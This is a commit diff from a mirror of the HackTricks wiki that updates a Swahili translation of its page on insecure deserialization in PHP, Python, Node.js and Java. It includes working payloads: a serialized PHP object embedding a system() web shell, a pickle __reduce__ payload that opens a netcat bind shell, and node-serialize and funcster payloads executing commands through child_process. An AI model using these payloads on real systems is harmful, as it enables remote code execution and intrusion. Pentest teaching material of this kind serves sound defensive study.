maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/deserialization/README.md', 'src/pentest

Browse Source
This commit is contained in:
Translator 2025-10-01 01:27:37 +00:00
parent ed47a3e1d1
commit 1fd90d6667
3 changed files with 383 additions and 223 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -622,6 +622,7 @@
- [Java JSF ViewState (.faces) Deserialization](pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md)
- [Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner](pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md)
- [Basic Java Deserialization (ObjectInputStream, readObject)](pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md)
- [Java Signedobject Gated Deserialization](pentesting-web/deserialization/java-signedobject-gated-deserialization.md)
- [PHP - Deserialization + Autoload Classes](pentesting-web/deserialization/php-deserialization-+-autoload-classes.md)
- [CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep](pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md)
- [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)](pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)

465
src/pentesting-web/deserialization/README.md
View File

@ -4,21 +4,21 @@
## Basic Information
**Serialization** inamaanika kama njia ya kubadilisha kitu kuwa katika muundo ambao unaweza kuhifadhiwa, kwa nia ya ama kuhifadhi kitu hicho au kukituma kama sehemu ya mchakato wa mawasiliano. Tekni hii hutumiwa mara nyingi kuhakikisha kwamba kitu hicho kinaweza kuundwa tena baadaye, ikihifadhi muundo na hali yake.
**Serialization** inafafanuliwa kama njia ya kubadilisha object katika muundo unaoweza kuhifadhiwa, kwa lengo la kuhifadhi object au kuuituma kama sehemu ya mchakato wa mawasiliano. Mbinu hii kawaida hutumika kuhakikisha kuwa object inaweza kuundwa upya baadaye, ikihifadhi muundo wake na hali yake.
**Deserialization**, kinyume chake, ni mchakato unaopinga serialization. Inahusisha kuchukua data ambayo imeundwa katika muundo maalum na kuijenga tena kuwa kitu.
**Deserialization**, kwa upande mwingine, ni mchakato unaopingana na serialization. Unahusisha kuchukua data iliyopangwa kwa muundo maalum na kuirejesha kuwa object.
Deserialization inaweza kuwa hatari kwa sababu inaweza **kuruhusu washambuliaji kubadilisha data iliyosaralishwa ili kutekeleza msimbo mbaya** au kusababisha tabia isiyotarajiwa katika programu wakati wa mchakato wa ujenzi wa kitu.
Deserialization inaweza kuwa hatari kwa sababu inaweza kumruhusu mshambuliaji kuibadilisha data iliyoserialized ili kutekeleza code hatarishi au kusababisha tabia zisizotarajiwa kwenye application wakati wa mchakato wa kurejesha object.
## PHP
Katika PHP, mbinu maalum za kichawi hutumiwa wakati wa mchakato wa serialization na deserialization:
In PHP, magic methods maalum hutumika wakati wa mchakato wa serialization na deserialization:
- `__sleep`: Inaitwa wakati kitu kinaposaralishwa. Mbinu hii inapaswa kurudisha orodha ya majina ya mali zote za kitu ambazo zinapaswa kusaralishwa. Inatumika mara nyingi kuhifadhi data inayosubiri au kufanya kazi za usafi zinazofanana.
- `__wakeup`: Inaitwa wakati kitu kinaposaralishwa. Inatumika kurejesha uhusiano wowote wa database ambao unaweza kuwa umepotea wakati wa serialization na kufanya kazi nyingine za kuanzisha tena.
- `__unserialize`: Mbinu hii inaitwa badala ya `__wakeup` (ikiwa inapatikana) wakati kitu kinaposaralishwa. Inatoa udhibiti zaidi juu ya mchakato wa deserialization ikilinganishwa na `__wakeup`.
- `__destruct`: Mbinu hii inaitwa wakati kitu kinakaribia kuharibiwa au wakati script inamalizika. Inatumika kawaida kwa kazi za usafi, kama kufunga mikono ya faili au uhusiano wa database.
- `__toString`: Mbinu hii inaruhusu kitu kutendewa kama string. Inaweza kutumika kwa kusoma faili au kazi nyingine kulingana na wito wa kazi ndani yake, ikitoa kwa ufanisi uwakilishi wa maandiko wa kitu.
- `__sleep`: Huitwa wakati object inaposerialized. Njia hii inapaswa kurudisha array ya majina ya properties zote za object ambazo zinapaswa kuserialized. Kawaida hutumika kuhifadhi data iliyosubiri au kufanya kazi za kusafisha zinazofanana.
- `__wakeup`: Inaitwa wakati object inaposerialized tena (deserialized). Inatumika kuanzisha upya database connections ambazo zinaweza kuwa zimepotea wakati wa serialization na kufanya kazi nyingine za kuanzisha tena.
- `__unserialize`: Njia hii inaitwa badala ya `__wakeup` (ikiwa ipo) wakati object inaposerialized tena. Inatoa udhibiti zaidi juu ya mchakato wa deserialization ikilinganishwa na `__wakeup`.
- `__destruct`: Njia hii inaitwa wakati object iko karibu kuharibiwa au script inapomalizika. Kwa kawaida hutumika kwa kazi za kusafisha, kama kufunga file handles au database connections.
- `__toString`: Njia hii inaruhusu object kutendewa kama string. Inaweza kutumika kusoma file au kutekeleza kazi nyingine zinazotegemea function calls ndani yake, na hivyo kutoa uwakilishi wa kimaandishi wa object.
```php
<?php
class test {
@ -74,10 +74,10 @@ This is a test<br />
*/
?>
```
Ikiwa utaangalia matokeo, utaona kwamba kazi **`__wakeup`** na **`__destruct`** zinaitwa wakati kitu kinapokuwa deserialized. Kumbuka kwamba katika mafunzo kadhaa utaona kwamba kazi **`__toString`** inaitwa unapojaribu kuchapisha sifa fulani, lakini kwa wazi **hii haitendeki tena**.
If you look to the results you can see that the functions **`__wakeup`** and **`__destruct`** are called when the object is deserialized. Note that in several tutorials you will find that the **`__toString`** function is called when trying yo print some attribute, but apparently that's **not happening anymore**.
> [!WARNING]
> Njia **`__unserialize(array $data)`** inaitwa **badala ya `__wakeup()`** ikiwa imeanzishwa katika darasa. Inakuruhusu kuunserialize kitu kwa kutoa data iliyosajiliwa kama array. Unaweza kutumia njia hii kuunserialize mali na kufanya kazi zozote zinazohitajika wakati wa deserialization.
> Njia **`__unserialize(array $data)`** huitwa **badala ya `__wakeup()`** ikiwa imetekelezwa katika class. Inakuwezesha unserialize object kwa kutoa serialized data kama array. Unaweza kutumia njia hii ku-unserialize properties na kufanya kazi yoyote inayohitajika wakati wa deserialization.
>
> ```php
> class MyClass {
@ -85,24 +85,25 @@ Ikiwa utaangalia matokeo, utaona kwamba kazi **`__wakeup`** na **`__destruct`**
>
> public function __unserialize(array $data): void {
> $this->property = $data['property'];
> // Fanya kazi zozote zinazohitajika wakati wa deserialization.
> // Perform any necessary tasks upon deserialization.
> }
> }
> ```
Unaweza kusoma mfano wa **PHP ulioelezewa hapa**: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/), hapa [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) au hapa [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/)
Unaweza kusoma mfano wa PHP ulioelezewa hapa: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/), hapa [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) au hapa [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/)
### PHP Deserial + Autoload Classes
Unaweza kutumia vibaya kazi ya autoload ya PHP ili kupakia faili za php zisizo na mpangilio na zaidi:
Unaweza kutumia vibaya uwezo wa PHP autoload kupakia faili za php yoyote na zaidi:
{{#ref}}
php-deserialization-+-autoload-classes.md
{{#endref}}
### Serializing Referenced Values
### Kuserializa Thamani Zilizorejelewa
Ikiwa kwa sababu fulani unataka kusajili thamani kama **kiungo kwa thamani nyingine iliyosajiliwa**, unaweza:
Ikiwa kwa sababu fulani unataka kuserializa thamani kama a **reference to another value serialized** you can:
```php
<?php
class AClass {
@ -115,12 +116,12 @@ $o->param1 =& $o->param22;
$o->param = "PARAM";
$ser=serialize($o);
```
### Kuzuia Uingizaji wa Kitu cha PHP kwa `allowed_classes`
### Kuzuia PHP Object Injection na `allowed_classes`
> [!INFO]
> Msaada kwa **hoja ya pili** ya `unserialize()` (array ya `$options`) iliongezwa katika **PHP 7.0**. Katika toleo za zamani, kazi hiyo inakubali tu mfuatano wa serialized, na kufanya iwe vigumu kuzuia ni madarasa gani yanaweza kuanzishwa.
> Uungwaji mkono wa **second argument** ya `unserialize()` (the `$options` array) uliongezwa katika **PHP 7.0**. Katika toleo za zamani kazi hii inakubali tu the serialized string, na hivyo haiwezekani kuzuia ni madarasa gani may be instantiated.
`unserialize()` it **aanzisha kila darasa** inakopata ndani ya mfuatano wa serialized isipokuwa ikisemwa vinginevyo. Tangu PHP 7, tabia hii inaweza kuzuia kwa chaguo la [`allowed_classes`](https://www.php.net/manual/en/function.unserialize.php):
`unserialize()` itafanya **instantiate every class** itakayotafuta ndani ya serialized stream isipokuwa ikaambiwe vingine. Tangu PHP 7, tabia inaweza kuzuiawa kwa chaguo [`allowed_classes`](https://www.php.net/manual/en/function.unserialize.php):
```php
// NEVER DO THIS full object instantiation
$object = unserialize($userControlledData);
@ -135,11 +136,11 @@ $object = unserialize($userControlledData, [
'allowed_classes' => [MyModel::class, DateTime::class]
]);
```
Ikiwa **`allowed_classes` imeachwa** _au_ msimbo unafanya kazi kwenye PHP < 7.0, wito unakuwa **hatari** kwani mshambuliaji anaweza kuunda payload inayotumia mbinu za kichawi kama `__wakeup()` au `__destruct()` ili kufikia Remote Code Execution (RCE).
Ikiwa **`allowed_classes` imeachwa _au_ msimbo unakimbia kwenye PHP < 7.0**, wito unakuwa **hatari** kwani mshambuliaji anaweza kutengeneza payload inayotumia magic methods kama `__wakeup()` au `__destruct()` ili kupata Remote Code Execution (RCE).
#### Mfano wa kweli: Everest Forms (WordPress) CVE-2025-52709
#### Mfano wa ulimwengu wa kweli: Everest Forms (WordPress) CVE-2025-52709
Plugin ya WordPress **Everest Forms ≤ 3.2.2** ilijaribu kuwa na ulinzi kwa kutumia wrapper ya msaada lakini ilisahau kuhusu toleo la zamani la PHP:
Plugin ya WordPress **Everest Forms ≤ 3.2.2** ilijaribu kujilinda kwa wrapper ya msaada lakini ilisahau matoleo ya zamani ya PHP:
```php
function evf_maybe_unserialize($data, $options = array()) {
if (is_serialized($data)) {
@ -154,29 +155,29 @@ return @unserialize(trim($data));
return $data;
}
```
Katika seva ambazo bado zilikuwa zinaendesha **PHP ≤ 7.0**, tawi hili la pili lilisababisha **PHP Object Injection** ya kawaida wakati msimamizi alifungua uwasilishaji wa fomu mbaya. Payload ya ku exploit ya chini inaweza kuonekana kama:
Katika seva ambazo bado zilikuwa zikiendesha **PHP ≤ 7.0**, tawi hili la pili lilisababisha **PHP Object Injection** ya kawaida wakati msimamizi alifungua uwasilishaji wa fomu yenye madhara. Minimal exploit payload inaweza kuonekana kama:
```
O:8:"SomeClass":1:{s:8:"property";s:28:"<?php system($_GET['cmd']); ?>";}
```
Mara tu admin alipokutana na kuingia, kitu kilianzishwa na `SomeClass::__destruct()` kilitekelezwa, na kusababisha utekelezaji wa msimbo wa kiholela.
Mara tu admin alipotazama ingizo, object ilianzishwa na `SomeClass::__destruct()` ilitekelezwa, ikasababisha utekaji wa msimbo wa hiari.
**Mambo ya Kujifunza**
1. Daima pitisha `['allowed_classes' => false]` (au orodha ya nyeupe kali) unapoitisha `unserialize()`.
2. Kagua vifungashio vya kujihami mara nyingi wanakosa kuhusu matawi ya zamani ya PHP.
3. Kuweka toleo la **PHP ≥ 7.x** pekee si *sawa*: chaguo bado kinahitaji kutolewa wazi.
**Mambo Muhimu**
1. Daima pitisha `['allowed_classes' => false]` (au orodha nyeupe kali) unaponuita `unserialize()`.
2. Audit defensive wrappers mara nyingi husahau matawi ya zamani ya PHP.
3. Kuboresha kwenda **PHP ≥ 7.x** pekee si za kutosha: chaguo bado lazima itolewe wazi.
---
### PHPGGC (ysoserial kwa PHP)
### PHPGGC (ysoserial for PHP)
[**PHPGGC**](https://github.com/ambionics/phpggc) inaweza kukusaidia kuunda payloads za kutumia PHP deserializations.\
Kumbuka kwamba katika kesi kadhaa huwezi **kupata njia ya kutumia deserialization katika msimbo wa chanzo** wa programu lakini unaweza **kutumia msimbo wa nyongeza za PHP za nje.**\
Hivyo, ikiwa unaweza, angalia `phpinfo()` ya seva na **tafuta mtandaoni** (hata kwenye **gadgets** za **PHPGGC**) baadhi ya gadgets zinazoweza kutumiwa.
[**PHPGGC**](https://github.com/ambionics/phpggc) inaweza kukusaidia kutengeneza payloads za kuabusu PHP deserializations.\
Kumbuka kwamba katika baadhi ya kesi **huwezi kupata njia ya kuabusu deserialization katika source code** ya programu, lakini unaweza kuwa na uwezo wa **kuabusu code ya extensions za nje za PHP.**\
Kwa hivyo, ikiwa unaweza, angalia `phpinfo()` ya server na **tafuta mtandaoni** (na hata kwenye **gadgets** za **PHPGGC**) baadhi ya gadget ambazo unaweza kuabusu.
### phar:// metadata deserialization
Ikiwa umepata LFI inayosoma tu faili na si kutekeleza msimbo wa php ndani yake, kwa mfano kutumia kazi kama _**file_get_contents(), fopen(), file() au file_exists(), md5_file(), filemtime() au filesize()**_**.** Unaweza kujaribu kutumia **deserialization** inayotokea unapokuwa **ukisoma** **faili** kwa kutumia itifaki ya **phar**.\
Kwa maelezo zaidi soma chapisho lifuatalo:
Ikiwa umepata LFI inayosoma tu faili na haitekelezi php code ndani yake, kwa mfano kwa kutumia functions kama _**file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**_. Unaweza kujaribu kuabusu **deserialization** inayotokea wakati wa **kusoma** **faili** kwa kutumia protocol ya **phar**.\
Kwa taarifa zaidi soma chapisho lifuatalo:
{{#ref}}
@ -187,8 +188,8 @@ Kwa maelezo zaidi soma chapisho lifuatalo:
### **Pickle**
Wakati kitu kinapokutana na unpickle, kazi \_\_\_reduce\_\_\_ itatekelezwa.\
Wakati inatumika, seva inaweza kurudisha kosa.
Wakati object inapoundwa tena kwa unpickle, function \_\_\_reduce\_\_\_ itatekelezwa.\
Ikiitumiwa (exploited), server inaweza kurudisha kosa.
```python
import pickle, os, base64
class P(object):
@ -196,9 +197,10 @@ def __reduce__(self):
return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
print(base64.b64encode(pickle.dumps(P())))
```
Kabla ya kuangalia mbinu ya kupita, jaribu kutumia `print(base64.b64encode(pickle.dumps(P(),2)))` ili kuunda kitu ambacho kinapatana na python2 ikiwa unatumia python3.
Kabla ya kuangalia the bypass technique, jaribu kutumia `print(base64.b64encode(pickle.dumps(P(),2)))` ili kuunda object inayolingana na python2 ikiwa unatumia python3.
Kwa habari zaidi kuhusu kukimbia kutoka kwa **pickle jails** angalia:
Kwa maelezo zaidi kuhusu kutoroka kutoka **pickle jails** angalia:
{{#ref}}
../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
@ -206,7 +208,8 @@ Kwa maelezo zaidi kuhusu kutoroka kutoka **pickle jails** angalia:
### Yaml **&** jsonpickle
Ukurasa ufuatao un presenting mbinu ya **kudhulumu deserialization isiyo salama katika yamls** maktaba za python na kumaliza na chombo ambacho kinaweza kutumika kuunda RCE deserialization payload kwa **Pickle, PyYAML, jsonpickle na ruamel.yaml**:
Ukurasa ufuatao unaonyesha mbinu ya **abuse an unsafe deserialization in yamls** katika maktaba za Python na unamaliza na chombo kinachoweza kutumika kuunda payload za RCE za deserialization kwa **Pickle, PyYAML, jsonpickle and ruamel.yaml**:
{{#ref}}
python-yaml-deserialization.md
@ -214,6 +217,7 @@ python-yaml-deserialization.md
### Class Pollution (Python Prototype Pollution)
{{#ref}}
../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md
{{#endref}}
@ -222,10 +226,10 @@ python-yaml-deserialization.md
### JS Magic Functions
JS **haina "magic" functions** kama PHP au Python ambazo zitatekelezwa tu kwa ajili ya kuunda kitu. Lakini ina **functions** ambazo zinatumika **mara kwa mara hata bila kuziita moja kwa moja** kama **`toString`**, **`valueOf`**, **`toJSON`**.\
Ikiwa unatumia deserialization unaweza **kudhulumu hizi functions ili kutekeleza code nyingine** (kwa uwezekano wa kudhulumu prototype pollutions) unaweza kutekeleza code isiyo na mipaka wakati zinapoitwa.
JS **doesn't have "magic" functions** kama PHP au Python ambazo zitaendeshwa tu kwa ajili ya kuunda object. Lakini ina baadhi ya **functions** ambazo **hutumika mara kwa mara hata bila kuziita moja kwa moja** kama **`toString`**, **`valueOf`**, **`toJSON`**.\
Ikiwa ukitumia deserialization vibaya unaweza **kudanganya hizi functions ili kuendesha code nyingine** (inawezekana kwa kutumia prototype pollutions) hivyo unaweza kuendesha code yoyote inapoitwa.
Njia nyingine **"magic" ya kuita function** bila kuikalia moja kwa moja ni kwa **kudhulumu kitu ambacho kinarejeshwa na function ya async** (ahadi). Kwa sababu, ikiwa un **abadilisha** hiyo **kitu kinachorejeshwa** kuwa ahadi nyingine yenye **sifa** inayoitwa **"then" ya aina function**, itatekelezwa **tu kwa sababu inarejeshwa na ahadi nyingine.** _Fuata_ [_**kiungo hiki**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _kwa maelezo zaidi._
Njia nyingine ya **"magic" way to call a function** bila kuiita moja kwa moja ni kwa **kuharibu object inayorejeshwa na async function** (promise). Kwa sababu, ikiwa uta**transform** ile **return object** kuwa promise nyingine yenye **property** called **"then" of type function**, itatekelezwa tu kwa sababu inarejeshwa na promise nyingine. _Follow_ [_**this link**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _for more info._
```javascript
// If you can compromise p (returned object) to be a promise
// it will be executed just because it's the return object of an async function:
@ -249,9 +253,9 @@ test_ressolve()
test_then()
//For more info: https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/
```
### `__proto__` na uchafuzi wa `prototype`
### `__proto__` and `prototype` pollution
Ikiwa unataka kujifunza kuhusu mbinu hii **angalia tutorial ifuatayo**:
Ikiwa unataka kujifunza kuhusu mbinu hii **tazama mafunzo yafuatayo**:
{{#ref}}
@ -260,7 +264,7 @@ nodejs-proto-prototype-pollution/
### [node-serialize](https://www.npmjs.com/package/node-serialize)
Maktaba hii inaruhusu kusanifisha kazi. Mfano:
Maktaba hii inaruhusu ku-serialise functions. Mfano:
```javascript
var y = {
rce: function () {
@ -273,23 +277,23 @@ var serialize = require("node-serialize")
var payload_serialized = serialize.serialize(y)
console.log("Serialized: \n" + payload_serialized)
```
**kipande kilichopangwa** kitaonekana kama:
Kitu **kilichoserialishwa** kitaonekana kama:
```bash
{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
```
Unaweza kuona katika mfano kwamba wakati kazi inasajiliwa, bendera `_$$ND_FUNC$$_` inaongezwa kwenye kitu kilichosajiliwa.
You can see in the example that when a function is serialized the `_$$ND_FUNC$$_` flag is appended to the serialized object.
Ndani ya faili `node-serialize/lib/serialize.js` unaweza kupata bendera hiyo hiyo na jinsi msimbo unavyotumia hiyo.
Inside the file `node-serialize/lib/serialize.js` you can find the same flag and how the code is using it.
![](<../../images/image (351).png>)
![](<../../images/image (446).png>)
Kama unavyoona katika kipande cha mwisho cha msimbo, **ikiwa bendera imepatikana** `eval` inatumika kusafisha kazi, hivyo kimsingi **ingizo la mtumiaji linatumika ndani ya kazi ya `eval`**.
Kama unavyoona katika sehemu ya mwisho ya code, **ikiwa bendera inapopatikana** `eval` inatumiwa kufanya deserialize ya function, kwa hivyo kwa msingi **user input inatumika ndani ya `eval` function**.
Hata hivyo, **kusaidia tu** kazi **hakutatekeleza** kwani itahitajika sehemu fulani ya msimbo **kuitisha `y.rce`** katika mfano wetu na hiyo ni **ngumu sana**.\
Hata hivyo, unaweza tu **kubadilisha kitu kilichosajiliwa** **kwa kuongeza mabano** ili kutekeleza kiotomatiki kazi iliyosajiliwa wakati kitu kinaposafishwa.\
Katika kipande kijacho cha msimbo **angalia mabano ya mwisho** na jinsi kazi ya `unserialize` itatekeleza kiotomatiki msimbo:
Hata hivyo, **just serialising** a function **won't execute it** kwa sababu itabidi sehemu ya code iwe inafanya call ya **`y.rce`** katika mfano wetu na hiyo ni kwa kiasi kikubwa **haivozekani**.\
Walau, unaweza tu **modify the serialised object** kwa **kuongeza mabano** ili kuitekeleza moja kwa moja function iliyoserialized wakati object itakapofanyiwa deserialize.\
Katika kipande kinachofuata cha code **notice the last parenthesis** na jinsi `unserialize` function itakavyotekeleza code hiyo moja kwa moja:
```javascript
var serialize = require("node-serialize")
var test = {
@ -297,20 +301,20 @@ rce: "_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(er
}
serialize.unserialize(test)
```
Kama ilivyosemwa awali, maktaba hii itapata msimbo baada ya `_$$ND_FUNC$$_` na itau **tekeleza** kwa kutumia `eval`. Hivyo, ili **kuji-tekeleza msimbo** unaweza **kufuta sehemu ya uundaji wa kazi** na paranthesis ya mwisho na **kuendesha tu JS oneliner** kama katika mfano ufuatao:
Kama ilivyotajwa hapo awali, maktaba hii itachukua msimbo uliopo baada ya `_$$ND_FUNC$$_` na itaufanya **execute it** kwa kutumia `eval`. Kwa hivyo, ili **auto-execute code** unaweza **delete the function creation** na parenthesis ya mwisho, na **just execute a JS oneliner** kama katika mfano ufuatao:
```javascript
var serialize = require("node-serialize")
var test =
"{\"rce\":\"_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })\"}"
serialize.unserialize(test)
```
Unaweza [**kupata hapa**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **taarifa zaidi** kuhusu jinsi ya kutumia udhaifu huu.
Unaweza [**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **taarifa zaidi** kuhusu jinsi ya exploit this vulnerability.
### [funcster](https://www.npmjs.com/package/funcster)
Jambo muhimu kuhusu **funcster** ni ukosefu wa upatikanaji wa **vitu vya ndani vilivyojengwa**; vinatoka nje ya upeo unaopatikana. Kikomo hiki kinazuia utekelezaji wa msimbo unaojaribu kuita mbinu kwenye vitu vya ndani, na kusababisha makosa kama `"ReferenceError: console is not defined"` wakati amri kama `console.log()` au `require(something)` zinapotumika.
Sehemu ya kupendeza ya **funcster** ni kutokuwepo kwa ufikikaji wa **vitu vilivyojengwa vya kawaida**; viko nje ya eneo linaloweza kufikiwa. Kizuizi hiki kinazuia utekelezaji wa code inayojaribu kuitisha methods kwenye vitu vilivyojengwa, na kusababisha exceptions kama `"ReferenceError: console is not defined"` wakati amri kama `console.log()` au `require(something)` zinapotumika.
Licha ya kikomo hiki, urejeleaji wa upatikanaji kamili wa muktadha wa kimataifa, ikiwa ni pamoja na vitu vyote vya ndani vilivyojengwa, inawezekana kupitia njia maalum. Kwa kutumia muktadha wa kimataifa moja kwa moja, mtu anaweza kupita kikomo hiki. Kwa mfano, upatikanaji unaweza kurejelewa kwa kutumia kipande kifuatacho:
Licha ya kizuizi hiki, kurejeshwa kwa ufikaji kamili wa global context, ikiwa ni pamoja na vitu vyote vilivyojengwa vya kawaida, inawezekana kwa njia maalum. Kwa kutumia global context moja kwa moja, mtu anaweza kupitisha kizuizi hiki. Kwa mfano, ufikaji unaweza kurejeshwa kwa kutumia snippet ifuatayo:
```javascript
funcster = require("funcster")
//Serialization
@ -332,17 +336,17 @@ __js_function:
}
funcster.deepDeserialize(desertest3)
```
**Kwa**[ **maelezo zaidi soma chanzo hiki**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
**Kwa**[ **more information read this source**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
### [**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript)
Kifurushi cha **serialize-javascript** kimeundwa mahsusi kwa ajili ya kusawazisha, hakina uwezo wowote wa kujisawazisha. Watumiaji wanawajibika kutekeleza njia zao za kujisawazisha. Matumizi ya moja kwa moja ya `eval` yanapendekezwa na mfano rasmi wa kujisawazisha data iliyosawazishwa:
Kifurushi cha **serialize-javascript** kimeundwa mahsusi kwa ajili ya serialization pekee; hakina uwezo wowote wa deserialization uliojengewa ndani. Watumiaji wanawajibika kutekeleza njia zao za deserialization. Mfano rasmi unapendekeza matumizi ya moja kwa moja ya `eval` kwa ajili ya deserializing serialized data:
```javascript
function deserialize(serializedJavascript) {
return eval("(" + serializedJavascript + ")")
}
```
Ikiwa kazi hii inatumika kuunda tena vitu unaweza **kuiharibu kwa urahisi**:
Ikiwa function hii inatumiwa ku-deserialize objects, unaweza **kwa urahisi exploit it**:
```javascript
var serialize = require("serialize-javascript")
//Serialization
@ -358,88 +362,98 @@ deserialize(test)
```
**Kwa**[ **maelezo zaidi soma chanzo hiki**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
### Maktaba ya Cryo
### Cryo library
Katika kurasa zifuatazo unaweza kupata taarifa kuhusu jinsi ya kutumia vibaya maktaba hii ili kutekeleza amri zisizo na mipaka:
Kwenye kurasa zifuatazo unaweza kupata taarifa kuhusu jinsi ya kutumia library hii kutekeleza amri yoyote:
- [https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)
- [https://hackerone.com/reports/350418](https://hackerone.com/reports/350418)
## Java - HTTP
Katika Java, **kurejesha maoni ya deserialization hufanyika wakati wa mchakato wa deserialization**. Utendaji huu unaweza kutumiwa na washambuliaji wanaounda payload hatari zinazochochea maoni haya, na kusababisha utekelezaji wa vitendo vya hatari.
Katika Java, **deserialization callbacks are executed during the process of deserialization**. Utekelezaji huu unaweza kutumiwa na wadukuzi wanaotengeneza payloads zilizo hatarishi ambazo zinawasha callbacks hizi, na kusababisha uwezekano wa utekelezaji wa vitendo hatarishi.
### Alama za Kidole
### Fingerprints
#### Sanduku la Nyeupe
#### White Box
Ili kubaini uwezekano wa udhaifu wa serialization katika msimbo, tafuta:
Ili kubaini udhaifu unaowezekana wa serialization katika codebase, tafuta:
- Madarasa yanayotekeleza interface ya `Serializable`.
- Matumizi ya `java.io.ObjectInputStream`, `readObject`, `readUnshare` kazi.
- Matumizi ya `java.io.ObjectInputStream`, `readObject`, `readUnshare` functions.
Zingatia kwa makini:
Lipa umakini zaidi kwa:
- `XMLDecoder` inayotumika na vigezo vilivyofafanuliwa na watumiaji wa nje.
- Njia ya `fromXML` ya `XStream`, hasa ikiwa toleo la XStream ni sawa na au chini ya 1.46, kwani linaweza kuwa na matatizo ya serialization.
- `ObjectInputStream` iliyoambatanishwa na njia ya `readObject`.
- Utekelezaji wa njia kama `readObject`, `readObjectNodData`, `readResolve`, au `readExternal`.
- `XMLDecoder` inayotumika na vigezo vinavyowekwa na watumiaji wa nje.
- Mbinu ya `fromXML` ya `XStream`, hasa ikiwa toleo la XStream ni dogo au sawa na 1.46, kwani linaweza kuathirika na matatizo ya serialization.
- `ObjectInputStream` pamoja na method ya `readObject`.
- Utekelezaji wa methods kama `readObject`, `readObjectNodData`, `readResolve`, au `readExternal`.
- `ObjectInputStream.readUnshared`.
- Matumizi ya jumla ya `Serializable`.
- Matumizi kwa ujumla ya `Serializable`.
#### Sanduku la Nyeusi
#### Black Box
Kwa upimaji wa sanduku la nyeusi, angalia **sahihi maalum au "Magic Bytes"** zinazotambulisha vitu vilivyopangwa vya java (vinavyotokana na `ObjectInputStream`):
Kwa upimaji wa black box, angalia **signatures au "Magic Bytes"** maalum zinazotambulisha java serialized objects (zinazoanzia kutoka `ObjectInputStream`):
- Mchoro wa hexadecimal: `AC ED 00 05`.
- Mchoro wa Base64: `rO0`.
- Vichwa vya majibu ya HTTP vyenye `Content-type` vilivyowekwa kuwa `application/x-java-serialized-object`.
- Mchoro wa hexadecimal unaoashiria kufungwa kwa awali: `1F 8B 08 00`.
- Mchoro wa Base64 unaoashiria kufungwa kwa awali: `H4sIA`.
- Faili za wavuti zenye kiambishi cha `.faces` na parameter ya `faces.ViewState`. Kugundua mifumo hii katika programu ya wavuti inapaswa kusababisha uchunguzi kama ilivyoelezwa katika [post kuhusu Java JSF ViewState Deserialization](java-jsf-viewstate-.faces-deserialization.md).
- Muundo wa hexadecimal: `AC ED 00 05`.
- Muundo wa Base64: `rO0`.
- HTTP response headers zenye `Content-type` imesetwa kuwa `application/x-java-serialized-object`.
- Muundo wa hexadecimal unaoonyesha compression kabla: `1F 8B 08 00`.
- Muundo wa Base64 unaoonyesha compression kabla: `H4sIA`.
- Faili za wavuti zenye ugani `.faces` na parameter `faces.ViewState`. Kugundua mifumo hii katika application ya wavuti kunapaswa kusababisha uchunguzi kama ilivyoelezwa katika [chapisho kuhusu Java JSF ViewState Deserialization](java-jsf-viewstate-.faces-deserialization.md).
```
javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s
```
### Angalia kama kuna udhaifu
### Angalia ikiwa kuna udhaifu
Ikiwa unataka **kujifunza jinsi unavyofanya kazi ya Java Deserialized exploit** unapaswa kuangalia [**Basic Java Deserialization**](basic-java-deserialization-objectinputstream-readobject.md), [**Java DNS Deserialization**](java-dns-deserialization-and-gadgetprobe.md), na [**CommonsCollection1 Payload**](java-transformers-to-rutime-exec-payload.md).
